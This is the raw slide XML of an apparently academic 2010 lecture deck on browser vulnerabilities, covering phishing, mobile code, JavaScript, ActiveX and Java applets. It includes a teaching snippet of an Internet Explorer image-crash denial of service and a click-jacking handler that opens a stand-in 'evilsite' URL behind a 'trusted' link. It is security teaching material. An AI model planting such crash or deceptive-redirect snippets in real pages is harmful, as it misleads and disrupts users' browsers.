            <a:fld id="{EE80315E-0E68-46A7-A333-3319F36C57FE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23777-78E0-4D6B-80CB-861A4A7A4195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81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295400"/>
            <a:ext cx="3792855" cy="4631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5439727" y="6019800"/>
            <a:ext cx="2971800" cy="323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750"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="6767FF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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.anti-phishing.com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IE Image Crash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/>
              <a:t>Browser implementation bugs can lead to denial of service attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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/>
              <a:t>The classic image crash in Internet Explorer is a perfect example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="11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By creating a simple image of extremely large proportions, one can crash Internet Explorer and sometimes freeze a Windows machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45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latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	&lt;HTML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45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latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	   &lt;BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45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latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	      &lt;IMG SRC="./imagecrash.jpg" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>width="9999999" height="9999999"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;	&lt;/BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45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latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	&lt;/HTML&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="11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/>
              <a:t>Variations of the image crash attack still possible on the latest IE version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04F5B4-BD3A-4409-93D6-AD98FD9C025A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/17/2010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C29F4-FE97-4EEB-BB3D-4622D4D00C1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Mobile Code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mobile code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Executable program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sent via a computer network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Executed at the destination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ActiveX</a:t>
            </a:r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Plugins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integrated Java Virtual Machines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600C9-8FF9-4ACA-9D9B-77D599D58F7C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/17/2010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Web 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2E078-386A-4925-87A9-F95C02EC0F81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83225"/>
            <a:ext cx="8229600" cy="72423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JavaScript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FCEA6-3CE5-441E-8175-B736A1ECE35A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr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AB4B-99F0-4159-B8AB-E3A07BEC5713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Scripting language interpreted by the browser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Code enclosed within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; … &lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tags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Defining functions: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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;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6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hello() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert("Hello world</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!"); }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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Event handlers embedded in HTML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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="picture.gif" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onMouseOver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript:hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a: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en-US" dirty="0" smtClean="0"/>
              <a:t>Built-in functions can change content of window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900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	window.open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://brown.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill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en-US" dirty="0" smtClean="0"/>
              <a:t>Click-jacking attack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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onMouseUp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window.open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.evilsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent6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href="http://www.trustedsite.com/"&gt;Trust me!&lt;/a&gt;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ActiveX vs. Java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112838"/>
            <a:ext cx="4040188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ActiveX Control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648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Windows-only technology runs in Internet Explorer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Binary code executed on behalf of browser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accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can access user files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Support for signed code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An installed control can be run by any site (up to IE7)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IE configuration options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Allow, deny, prompt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Administrator approval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112838"/>
            <a:ext cx="4041775" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Java Applet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28924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/>
              <a:t>Platform-independent via browser plugin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Java code running within browser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solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sandboxed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> execution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Support for signed code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Applet runs only on site where it is embedded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Applets deemed trusted by user can escape sandbox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DFCFA0-EEA5-43D0-A565-FC0AD80A5C6E}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/17/2010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Web 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BD6E5-948C-41C0-86B8-90ABF3B25B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D9969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1755</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>369</Paragraphs>
  <Slides>28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Web Security</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>Phishing</vt:lpstr>
      <vt:lpstr>Phishing Example</vt:lpstr>
      <vt:lpstr>URL Obfuscation</vt:lpstr>
      <vt:lpstr>IE Image Crash</vt:lpstr>
      <vt:lpstr>Mobile Code</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>ActiveX vs. Java</vt:lpstr>
      <vt:lpstr>Embedding an ActiveX Control</vt:lpstr>
      <vt:lpstr>Authenticode in ActiveX</vt:lpstr>
      <vt:lpstr>Trusted/Untrusted ActiveX controls </vt:lpstr>
      <vt:lpstr>Classic ActiveX Exploits</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>More on Cookies</vt:lpstr>
      <vt:lpstr>Taking Care of Your Cookies</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>XSS Example</vt:lpstr>
      <vt:lpstr>Cookie Stealing XSS Attacks</vt:lpstr>
      <vt:lpstr>Another XSS Attack</vt:lpstr>
      <vt:lpstr>Client-side XSS defenses</vt:lpstr>
      <vt:lpstr>SQL Injection Attack</vt:lpstr>
      <vt:lpstr>SQL: Standard Query Language</vt:lpstr>
      <vt:lpstr>SQL Syntax</vt:lpstr>
      <vt:lpstr>SQL Syntax</vt:lpstr>
      <vt:lpstr>Login Authentication Query</vt:lpstr>
      <vt:lpstr>Some improvements …</vt:lpstr>
      <vt:lpstr>Correct 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Browser Vulnerabilities</dc:title>
  <dc:creator>rt</dc:creator>
  <cp:lastModifiedBy>goodrich</cp:lastModifiedBy>
  <cp:revision>216</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-11-17T22:42:41Z</dcterms:modified>
</cp:coreProperties>
</file>